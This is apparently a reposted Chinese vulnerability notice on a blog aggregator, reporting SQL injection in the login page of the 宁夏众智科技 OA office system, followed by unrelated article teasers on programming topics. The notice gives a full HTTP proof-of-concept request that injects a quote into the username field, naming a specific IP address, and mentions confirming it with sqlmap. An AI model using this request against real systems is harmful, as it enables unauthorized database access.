宁夏众智科技OA办公系统存在SQL注入漏洞

news2024/10/1 16:30:05

漏洞描述

漏洞复现

POC

POST /Account/Login?ACT=Index&CLR=Home HTTP/1.1
Host: 
Content-Length: 45
Cache-Control: max-age=0
Origin: http://39.105.48.206
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://39.105.48.206/Account/Login?ACT=Index&CLR=Home
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive

username=admin%27&password=1&RememberMe=false

bp报错500

sqlmap确认漏洞

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2182716.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

【C语言指南】数据类型详解（上）——内置类型

💓 博客主页：倔强的石头的CSDN主页 📝Gitee主页：倔强的石头的gitee主页 ⏩ 文章专栏：《C语言指南》期待您的关注目录引言 1. 整型（Integer Types） 2. 浮点型（Floating-Point …

C++ 游戏开发

C游戏开发 C 是一种高效、灵活且功能强大的编程语言，因其性能和控制能力而在游戏开发中被广泛应用。许多著名的游戏引擎，如 Unreal Engine、CryEngine 和 Godot 等，都依赖于 C 进行核心开发。本文将详细介绍 C 在游戏开发中的应用&#xff0…

【机器学习】ID3、C4.5、CART 算法

目录常见的决策树算法 1. ID3 2. C4.5 3. CART 决策树的优缺点优点： 缺点： 决策树的优化常见的决策树算法 1. ID3 ID3（Iterative Dichotomiser 3）算法使用信息增益作为特征选择的标准。它是一种贪心算法，信…

Ubuntu开机进入紧急模式处理

文章目录 Ubuntu开机进入紧急模式处理一、问题描述二、解决办法参考 Ubuntu开机进入紧急模式处理一、问题描述 Ubuntu开机不能够正常启动，自动进入紧急模式（You are in emergency mode）。具体如下所示： 二、解决办法按CtrlD进…

基于SpringBoot+Vue的智能宾馆预定系统

作者：计算机学姐开发技术：SpringBoot、SSM、Vue、MySQL、JSP、ElementUI、Python、小程序等，“文末源码”。专栏推荐：前后端分离项目源码、SpringBoot项目源码、Vue项目源码、SSM项目源码、微信小程序源码精品专栏：…

基于人工智能的实时健身训练分析系统：深蹲姿态识别与动作评估

关于深度实战社区我们是一个深度学习领域的独立工作室。团队成员有：中科大硕士、纽约大学硕士、浙江大学硕士、华东理工博士等，曾在腾讯、百度、德勤等担任算法工程师/产品经理。全网20多万粉丝，拥有2篇国家级人工智能发明专利。社区特色…

前端css样式设置元素的绝对定位和相对定位，要注意宽度和高度的设置

vue3子div position absolute,父div positon relative 。如果不设置子div的 width 和height,那么子div中如果数据变长,子div相对父div位置会变化。子div数据超过，显示... 如何实现 <template><div class"parent"><div class"child&q…

[含文档+PPT+源码等]精品大数据项目-基于Django实现的高校图书馆智能推送系统的设计与实现

大数据项目——基于Django实现的高校图书馆智能推送系统的设计与实现背景，可以从以下几个方面进行详细阐述： 一、信息技术的发展背景随着信息技术的飞速发展和互联网的广泛普及，大数据已经成为现代社会的重要资源。在大数据背景下&#xf…

深入计算机语言之C++：C到C++的过度

🔑🔑博客主页：阿客不是客 🍓🍓系列专栏：从C语言到C语言的渐深学习欢迎来到泊舟小课堂 😘博客制作不易欢迎各位👍点赞⭐收藏➕关注一、什么是C C（c plus plus&#xff…

stm32单片机学习 - MDK仿真调试

1 进行环境配置点击 Options for Target，也就是我们俗称的魔法棒。将"C/C"中的Optimization选项选为Level 0(-O0) 作用:优化等级调为0级,便于调试时分析代码勾选"Debug"中的Load Application at Starup 和 Run to main() 选项作用:Load…

DBeaver详细安装与使用教程-免费的数据库管理工具

一、简介二、安装教程三、使用教程 1. 连接MySQL数据库 2. 查看表数据 3. 查看表属性 3. SQL编辑器和控制台 4.在DBeaver中设置定时备份数据库一、简介 dbeaver是一款的数据库连接工具，免费，跨平台。官网：DBeaver Community | …

前端——切换轮播图

学完前端js小知识后，动手操作的一个简单图片轮播图。 <!DOCTYPE html> <html lang"zh-CN"><head><meta charset"UTF-8"><meta name"keywords" content"关键词信息"><meta name"des…

数据中心交换机与普通交换机之间的区别到底在哪里？

号主：老杨丨11年资深网络工程师，更多网工提升干货，请关注公众号：网络工程师俱乐部上午好，我的网工朋友。数据中心交换被设计用来满足数据中心特有的高性能、高可靠性和可扩展性需求。与此同时，普通交换机…

ACL（Access Control List）访问控制列表

目录 ACL 访问控制列表 ACL分类 ACL的组成 ACL匹配机制 ACL调用方式实验配置不允许PC1访问PC4 只允许PC1访问PC4 高级ACL 基本概念实验配置限制ping 实验配置限制DNS 基于时间的ACL 实验配置 ACL 访问控制列表根据一系列不同的规则，设备根据这…

使用Python实现Auto.js的自动输入图形验证码

✅作者简介：2022年博客新星第八。热爱国学的Java后端开发者，修心和技术同步精进。 🍎个人主页：Java Fans的博客 🍊个人信条：不迁怒，不贰过。小知识，大智慧。 💞当前专栏…

【unity进阶知识6】Resources的使用，如何封装一个Resources资源管理器

文章目录一、Unity资源加载的几种方式1、Inspector窗口拖拽2、Resources3、AssetBundle4、Addressables（可寻址资源系统）5、AssetDatabase 二、准备三、同步加载Resources资源1、Resources.Load同步加载单个资源1.1、基本加载1.2、加载指定类型的资源1.…

详解JavaScript中把函数作为值

8.4 作为值的函数 JS中函数不仅是一种语法，也是值，也就是说，可以将函数赋值给变量，存储在对象的属性或者数组的元素中，作为参数传入另外一个函数等。来看一个函数：function square(x){return x*x;} 定义…

深度学习之入门书籍

自学深度学习，书籍很重要。从我个人来说，我不太习惯英译版本，或者那些牛人说的，直接读英文，我是水平不够。只讲自己的经验。牛人绕道。推荐书籍: 深度学习:从入门到精通，这本书不错。把基础的深度学习的…

自然语言处理问答系统技术

自然语言处理问答系统技术随着人工智能的不断发展，自然语言处理（NLP）技术已成为推动智能问答系统发展的核心技术。问答系统是利用NLP来解析用户提出的问题，并从知识库中找到最相关的答案。在许多应用中，如智能客服、…

用 LoRA 微调 Stable Diffusion：拆开炼丹炉，动手实现你的第一次 AI 绘画

总得拆开炼丹炉看看是什么样的。这篇文章将带你从代码层面一步步实现 AI 文本生成图像（Text-to-Image）中的 LoRA 微调过程，你将： 了解 Trigger Words（触发词）到底是什么，以及它们如何影响生成结…